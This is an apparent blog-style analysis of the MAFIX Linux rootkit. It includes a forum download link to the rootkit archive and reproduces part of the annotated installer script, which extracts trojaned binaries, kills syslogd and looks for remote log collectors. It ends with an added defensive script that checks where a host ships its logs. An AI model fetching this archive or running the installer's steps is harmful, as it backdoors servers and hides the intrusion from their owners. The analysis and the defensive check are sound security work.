
MAFIX - Linux 2.6 rootkit analysis

This backdoor is a nasty one. A server of mine was hit once by a modified version of it; that variant also added a module.

Download link:

https://forum.eviloctal.com/attachment.php?aid=13419

Archive contents:

MAXFIX
---HOW-TO
---mafix
---mafixlibs
---root

Below is the content of root, i.e. the install script.

#!/bin/bash
######################
# mafix 0.2          #
# fud 2009/07/15     #
######################

BASEDIR=`pwd`
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

# ANSI colour codes. The original file embeds a literal ESC byte (shown as ^[
# in the dump); written here as $'\033' so the script runs as pasted. Note the
# rootkit's own quirks: CYN is the same grey as BLK, and RED is actually green.
BLK=$'\033[1;30m'
MAG=$'\033[1;35m'
CYN=$'\033[1;30m'
RED=$'\033[1;32m'
DMAG=$'\033[1;37m'
RES=$'\033[0m'

echo "${CYN}      ___           ___           ___    ${DMAG}           ${CYN}      ___     ${RES}"
echo "${CYN}     /__/\         /  /\         /  /\   ${DMAG}   ___     ${CYN}     /__/|    ${RES}"
echo "${CYN}    |  |::\       /  /::\       /  /:/_  ${DMAG}  /  /\    ${CYN}    |  |:|    ${RES}"
echo "${CYN}    |  |:|:\     /  /:/\:\     /  /:/ /\ ${DMAG} /  /:/    ${CYN}    |  |:|    ${RES}"
echo "${CYN}  __|__|:|\:\   /  /:/~/::\   /  /:/ /:/ ${DMAG}/__/::\    ${CYN}  __|__|:|    ${RES}"
echo "${CYN} /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/  ${DMAG}\__\/\:\__ ${CYN} /__/::::\____${RES}"
echo "${CYN} \  \:\~~\__\/ \  \:\/:/__\/ \  \:\/:/   ${DMAG}   \  \:\/\ ${CYN}   ~\~~\::::/${RES}"
echo "${CYN}  \  \:\        \  \::/       \  \::/    ${DMAG}    \__\::/${CYN}     |~~|:|~~ ${RES}"
echo "${CYN}   \  \:\        \  \:\        \  \:\    ${DMAG}    /__/:/ ${CYN}     |  |:|   ${RES}"
echo "${CYN}    \  \:\        \  \:\        \  \:\   ${DMAG}    \__\/  ${CYN}     |  |:|   ${RES}"
echo "${CYN}     \__\/         \__\/         \__\/   ${DMAG}           ${CYN}     |__|/    ${RES}"
echo "${DMAG}${RES}"
echo "${DMAG}- the ferrari of rootkits - ${RES}"
sleep 5

# Unpack the bundled trojaned binaries (mafixlibs is a gzipped tarball).
echo "${CYN}mafix!${DMAG} > ${CYN} extracting libs...${RES}"
tar zxf mafixlibs

# The root check comes only after extraction, so the libs are left on disk
# even when the installer bails out here.
if [ "$(whoami)" != "root" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} you need to be root to backdoor the box...${RES}"
   exit
fi

cd $BASEDIR
sleep 1

# Stop local logging before touching the system. Only the classic sysklogd
# daemon is targeted; rsyslogd, syslog-ng or journald would keep running.
killall -9 syslogd >/dev/null 2>&1

# Despite the name, this records only the seconds field of the clock.
startime=`date +%S`
echo "${CYN}mafix!${DMAG} > ${CYN} backdooring box...${RES}"

# Look for off-host log destinations (an @target action) in /etc/syslog.conf:
# anything already shipped to a remote collector cannot be cleaned from here.
SYSLOGCONF="/etc/syslog.conf"
REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2`
if [ ! -z "$REMOTE" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} Remote logging found! I hope you got access to these box:${RES}"
        echo
        for host in $REMOTE; do
                echo -n "            "
                echo $host
        done
        echo
        # Single quotes in the original: the colour variables print literally.
        echo ' ${CYN}coz this box is logging to it${RES}'
fi
# The installer continues past this point; the remainder is not reproduced on this page.
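The remote-logging check is the one piece of reconnaissance in this part of the installer, and it is just as useful in reverse: a defender can run the same test to confirm that a box ships its logs somewhere an intruder with root cannot reach. The script below is an added example, not part of MAFIX or of this post. It applies the rootkit's own grep/cut pipeline and a stricter awk parser to a constructed syslog.conf (the host names are made up) and shows two things a practitioner should know about that pipeline: cut leaves a :port suffix on the host, and an rsyslog TCP destination written as @@host produces an empty field and is missed entirely, so a box logging over TCP would be reported as having no remote logging.

```bash
#!/bin/sh
# Added example: compare the MAFIX remote-logging check with a stricter parser.
# Sample configuration and host names are constructed for this demo.

# Constructed sample /etc/syslog.conf (hosts are fictitious).
SAMPLE_CONF='# /etc/syslog.conf sample (constructed)
*.info;mail.none;authpriv.none   /var/log/messages
authpriv.*                       /var/log/secure
# *.* @commented.example.org
*.*                              @udp-collector.example.org
auth.*                           @@tcp-collector.example.org:6514
kern.*                           @udp2.example.org:514
mail.*                           -/var/log/maillog'

# The rootkit's extraction logic, verbatim, applied to the given file.
# Each output line is whatever follows the first '@' up to the next '@',
# so '@@host' yields an empty line and ':port' is kept.
mafix_remote_hosts() {
    grep -v "^#" "$1" | grep -v "^$" | grep "@" | cut -d '@' -f 2
}

# Stricter parser: skip comments and blank lines, take only entries whose
# action field begins with @ (UDP) or @@ (TCP), strip the prefix and any
# trailing :port, and print one host per line.
remote_log_targets() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        $2 ~ /^@@?/ {
            host = $2
            sub(/^@@?/, "", host)
            sub(/:[0-9]+$/, "", host)
            print host
        }
    ' "$1"
}

main() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_CONF" > "$tmp"
    echo "== what the MAFIX pipeline reports =="
    mafix_remote_hosts "$tmp"
    echo "== what the stricter parser reports =="
    remote_log_targets "$tmp"
    rm -f "$tmp"
}

main
```

Run it against a real /etc/syslog.conf or /etc/rsyslog.conf by passing the path to either function; on a host that logs only over TCP (@@), the rootkit's version prints nothing useful while the awk version still names the collector. The same word-splitting the installer relies on (for host in $REMOTE) is what silently drops the empty field, which is why the gap never shows up as an error in the attacker's output.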
